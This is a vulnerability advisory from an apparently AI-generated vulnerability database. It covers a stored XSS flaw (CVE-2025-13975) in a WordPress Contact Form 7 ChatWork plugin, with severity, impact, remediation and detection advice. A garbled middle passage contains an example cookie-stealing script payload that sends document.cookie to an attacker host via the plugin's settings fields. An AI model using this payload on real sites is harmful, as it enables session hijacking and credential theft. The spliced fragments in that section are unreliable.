
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-13975 is a Stored Cross-Site Scripting (XSS) vulnerability in the "Contact Form 7 with ChatWork" plugin for WordPress, affecting all versions up to and including 1.1.0. The flaw exists in the api_token and roomid settings fields due to insufficient input sanitization and output escaping. It was published on December 12, 2025, and assigned a CVSS v3.1 base score of 4.4 (Medium) (Wordfence, Red Hat CVE). Exploitation is limited to multi-site WordPress installations or those where unfiltered_html has been disabled.
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). Specifically, the plugin fails to properly sanitize and escape user-supplied values for the api_token and roomid settings before rendering them on the plugin's settings page. An authenticated attacker with administrator-level privileges can save malicious JavaScript payloads into these fields; the scripts then execute in the browser of any user who subsequently visits the settings page (Wordfence, Plugin Source). The attack vector is network-based with high attack complexity and requires high privileges, limiting the practical attack surface.
Successful exploitation allows an authenticated administrator to persistently inject arbitrary JavaScript that executes in the context of other users' browsers when they access the plugin's settings page. This can lead to session hijacking, credential theft, unauthorized administrative actions, or further compromise of the WordPress site. The confidentiality and integrity impacts are rated low, and there is no direct availability impact; however, in multi-site environments, the blast radius may extend across multiple sub-sites (Wordfence, Red Hat CVE).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for CVE-2025-13975. The EPSS score is approximately 0.028% (0.000280), indicating a very low probability of exploitation in the near term (Feedly). The vulnerability requires authenticated administrator-level access and is further constrained to multi-site installations or those with unfiltered_html disabled, significantly reducing the exploitable population. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
unfiltered_html disabled, and that the "Contact Form 7 with ChatWork" plugin version ≤1.1.0 is active.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the api_token or roomid field and save the settings.api_token or roomid fields) by an administrator account.wp_options table) for entries containing <script> tags or encoded JavaScript in the cf7cw_api_token or cf7cw_roomid option keys.Users should update the "Contact Form 7 with ChatWork" plugin to version 1.1.1 or later, which addresses the insufficient sanitization and output escaping issues (Wordfence). As a temporary workaround, site administrators can deactivate the plugin until patching is feasible. Additionally, restricting administrator access to trusted users and enabling unfiltered_html only where strictly necessary can reduce exposure. Multi-site network administrators should prioritize patching given the broader potential impact across sub-sites.
The vulnerability was discovered and disclosed by Wordfence, which published the advisory on December 12, 2025. No notable broader media coverage, researcher commentary, or significant community discussion has been identified beyond the standard vulnerability disclosure channels (Wordfence).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."